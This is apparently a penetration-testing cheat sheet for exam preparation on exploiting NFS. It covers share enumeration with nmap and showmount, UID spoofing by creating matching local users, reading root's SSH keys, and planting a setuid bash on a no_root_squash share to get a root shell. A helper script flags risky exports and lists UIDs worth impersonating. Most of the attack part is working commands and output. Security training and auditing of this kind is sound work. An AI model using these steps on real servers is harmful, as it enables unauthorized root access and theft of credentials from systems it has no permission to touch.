NFS Exploitation

NFS share enumeration, UID spoofing over AUTH_SYS and no_root_squash abuse for privilege escalation, SUID binary planting, and NFS version fingerprinting techniques.

NFS Enumeration

# Discover NFS services
nmap -sV -p 111,2049 10.10.10.0/24
nmap -p 111 --script nfs-ls,nfs-showmount,nfs-statfs 10.10.10.5

# Show exported shares and the clients allowed to mount them
showmount -e 10.10.10.5
# Export list for 10.10.10.5:
# /share *
# /home  10.10.10.0/24
# Note: showmount does not print export options (rw, no_root_squash, ...);
# those live only in the server's /etc/exports and must be tested by mounting.

# RPC info
rpcinfo -p 10.10.10.5

Mounting Shares

# Mount NFS share
sudo mkdir /mnt/nfs
sudo mount -t nfs 10.10.10.5:/share /mnt/nfs -o nolock

# List contents
ls -la /mnt/nfs

# Unmount
sudo umount /mnt/nfs

no_root_squash UID Spoofing

no_root_squash: With the default AUTH_SYS (sec=sys) security flavour the server trusts whatever numeric UID/GID the client sends, so any non-root UID can be impersonated simply by using that UID locally. The one exception is UID 0: by default the server squashes remote root to the anonymous user (anonuid, 65534, shown as nobody or nfsnobody). With no_root_squash that mapping is removed and the client's root is root on the exported directory, able to read, write and chown any file there.

# Check export options (look for no_root_squash)
cat /etc/exports  # only if you already have local access on the server
showmount -e 10.10.10.5  # remote: lists paths and allowed clients only, not options

# To impersonate a non-root owner: create a local user with the same UID as the file owner
# Example: file owned by UID 1000 on the remote share
ls -lan /mnt/nfs/  # shows numeric UIDs

# Create local user with matching UID
sudo useradd -u 1000 fakeuser
sudo su fakeuser
# Your requests now carry UID 1000, so the server treats you as the owner of those files

# On a no_root_squash share, use root directly:
sudo -i
# You are UID 0 -> no_root_squash gives you root on the share
ls /mnt/nfs/root/.ssh/  # if the export contains /root (e.g. / is exported), read root's SSH keys
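As an added example (not part of the original page), the following shell helpers automate the three checks above: parsing /etc/exports for no_root_squash and wildcard clients, probing a mounted share to see whether root was squashed, and listing the numeric owners worth impersonating with useradd -u. The sample /etc/exports content is constructed, the mount point /mnt/nfs is assumed, and GNU coreutils (stat -c, find -printf) plus awk are required.

```shell
#!/bin/sh
# Added example, not code from the original page: three helpers for the
# no_root_squash / UID-spoofing checks. Paths such as /mnt/nfs and the
# sample /etc/exports content are constructed for the demo.

# 1. Parse exports(5) text from stdin and flag risky client specs.
#    Output: "<path> <client> <options|-> <verdict>" per client spec.
#    A spec written "(rw)" with whitespace before the parenthesis applies
#    to every host ("*"), a classic misconfiguration this parser exposes.
audit_exports() {
    awk '
        { sub(/#.*/, "") }                              # strip comments
        /\\$/ { sub(/\\$/, ""); buf = buf $0; next }    # join continuation lines
        { $0 = buf $0; buf = "" }
        NF == 0 { next }
        {
            path = $1
            for (i = 2; i <= NF; i++) {
                spec = $i; client = spec; opts = ""
                if (match(spec, /\(.*\)$/)) {
                    client = substr(spec, 1, RSTART - 1)
                    opts = substr(spec, RSTART + 1, RLENGTH - 2)
                }
                if (client == "") client = "*"          # bare "(opts)" means everyone
                verdict = "ok"
                if (opts ~ /(^|,)no_root_squash(,|$)/) verdict = "NO_ROOT_SQUASH"
                else if (client == "*" && opts ~ /(^|,)rw(,|$)/) verdict = "WORLD_WRITABLE"
                else if (client == "*") verdict = "WORLD_READABLE"
                print path, client, (opts == "" ? "-" : opts), verdict
            }
        }'
}

# 2. Live check on a mounted share. Run as root on the client:
#    "preserved 0"         -> no_root_squash, you are root on the share
#    "squashed 0 -> 65534" -> root mapped to anonuid (nobody/nfsnobody)
#    Run as any other UID it confirms the server honours the client-asserted
#    UID, which is what the useradd -u trick relies on.
probe_squash() {
    dir=$1
    f="$dir/.squash_probe_$$"
    me=$(id -u)
    if ! : > "$f" 2>/dev/null; then
        echo "cannot write in $dir (read-only export, or squashed uid lacks permission)" >&2
        return 1
    fi
    owner=$(stat -c %u "$f")        # numeric owner as stored by the server
    rm -f "$f"
    if [ "$owner" = "$me" ]; then echo "preserved $me"; else echo "squashed $me -> $owner"; fi
}

# 3. Which numeric UIDs own files on the share? Each one is a candidate for
#    "useradd -u <uid>" (or "sudo -u '#<uid>'") on the attacking box.
owners_on_share() {
    find "$1" -xdev -printf '%U\n' 2>/dev/null | sort -nu
}

# Constructed /etc/exports, not from a real server.
SAMPLE_EXPORTS='# constructed sample
/share   *(rw,sync,no_root_squash)
/home    10.10.10.0/24(ro,sync)
/backup  10.10.10.20 (rw)
/pub     *'

printf '%s\n' "$SAMPLE_EXPORTS" | audit_exports
# Usage on a live mount: probe_squash /mnt/nfs ; owners_on_share /mnt/nfs
```

The /backup line in the sample shows why the parser splits on whitespace before looking at options: the server reads "10.10.10.20 (rw)" as a read-only export to that host plus a read-write export to everyone.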

SUID Binary Attack

# With no_root_squash, plant a SUID binary
# As root on your Kali (UID 0 is not squashed, so the server stores the file as root-owned):
sudo -i
cp /bin/bash /mnt/nfs/bash
chmod +s /mnt/nfs/bash   # setuid and setgid; use chmod 4755 for setuid only
ls -la /mnt/nfs/bash
# -rwsr-sr-x 1 root root ... bash

# On the target machine (after SSH/shell access), execute it from the
# exported directory itself, e.g. /share if that is what the server exports:
/share/bash -p
# -p keeps the effective UID 0; without it bash drops back to your real UID
whoami  # root
Requirements: a shell on the target, and the exported directory must live on (or be mounted from) a filesystem without nosuid or noexec, otherwise the kernel ignores the bit. The binary must also run on the target: same architecture and a compatible libc, so prefer a statically linked shell or copy the target's own /bin/bash into the share. The root ownership and SUID bit are set from your Kali side as UID 0 and stored by the server; the target simply sees a root-owned setuid file.

Exam Tips

  • Always run showmount -e during enumeration; NFS is commonly missed
  • World-readable shares (*(ro)) can still expose sensitive files: SSH keys, configs, database passwords
  • NFSv4 can display owners by name through idmapping (everything shows as nobody) instead of numeric UIDs; if the v4 mount fails or UID matching misbehaves, mount with -o vers=3
  • Check /etc/exports if you get a foothold; no_root_squash on home directories or / is a quick privesc
  • Port 2049 open (with 111 for the portmapper)? That is NFS; always try showmount